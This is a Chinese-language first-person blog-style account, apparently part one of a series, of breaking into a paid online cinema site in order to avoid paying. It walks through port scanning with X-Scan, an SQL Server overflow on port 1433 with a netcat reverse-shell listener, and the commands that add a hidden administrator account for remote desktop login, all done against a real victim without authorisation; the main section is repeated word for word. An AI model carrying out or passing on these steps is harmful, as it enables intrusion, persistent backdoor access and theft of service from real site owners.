黑客入侵“在线影院”全过程1

最近对网上看电影比较感兴趣，于是登录至某“在线影院”。本以为是免费，谁知问我要账号和密码，我可不想为这个掏钱。怎么办？先探探路。对我而言，入侵的过程是充满乐趣的，它刺激着我大脑的每一根神经，让我兴奋无比。我喜欢体味这种思维无拘放荡的快感，我喜欢沉醉其中。这是黑客营人的风格。于是，X-Scan开始勤恳地跑在了我的桌面上。

　　破门：久违的溢出工具

　　用X-Scan对该站点的Server扫描结果出来了，开的端口还不少呢：53、80、1433、3389。可并没有报告说发现有弱口令，看来网管还算比较有责任心。但开了3389端口，意味着可以远程登录，这可是微软给所有Windows用户献上的最大的“木马”。

　　通过观察，我发现只有在1433端口上下点工夫，想想办法。何不用SQL2溢出工具试试？

　　先开一个cmd窗口，祭出宝刀netcat，在命令提示符下敲入“netcat -l -p 99”，监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口，键入“sql2 218.147.*.* 61.157.*.* 0”，其中218.147.*.*是对方IP，61.157.*.*是我自己的IP，回车后提示package sent successful。再回过头去看看监听本地端口的netcat，已经变成了C:\\WinNT\\system32\\_，这就是对方机器的系统文件夹了，看来是成功溢出了，就这么简单。

　　我很幸运地得到了对方的一个Shell，而且还是administrator权限的。接下来的操作就轻车熟路了，添加用户，提升权限：在提示符下键入“net user hacker 12345 /add”（在对方机器里创建一个名为hacker，密码为12345的用户），再键入“net localgroup administrators hacker /add”（把用户hacker加入到管理员组），接下来就该是3389远程登录了。

　　破门：久违的溢出工具

　　用X-Scan对该站点的Server扫描结果出来了，开的端口还不少呢：53、80、1433、3389。可并没有报告说发现有弱口令，看来网管还算比较有责任心。但开了3389端口，意味着可以远程登录，这可是微软给所有Windows用户献上的最大的“木马”。

　　通过观察，我发现只有在1433端口上下点工夫，想想办法。何不用SQL2溢出工具试试？

　　先开一个cmd窗口，祭出宝刀netcat，在命令提示符下敲入“netcat -l -p 99”，监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口，键入“sql2 218.147.*.* 61.157.*.* 0”，其中218.147.*.*是对方IP，61.157.*.*是我自己的IP，回车后提示package sent successful。再回过头去看看监听本地端口的netcat，已经变成了C:\\WinNT\\system32\\_，这就是对方机器的系统文件夹了，看来是成功溢出了，就这么简单。

　　我很幸运地得到了对方的一个Shell，而且还是administrator权限的。接下来的操作就轻车熟路了，添加用户，提升权限：在提示符下键入“net user hacker 12345 /add”（在对方机器里创建一个名为hacker，密码为12345的用户），再键入“net localgroup administrators hacker /add”（把用户hacker加入到管理员组），接下来就该是3389远程登录了。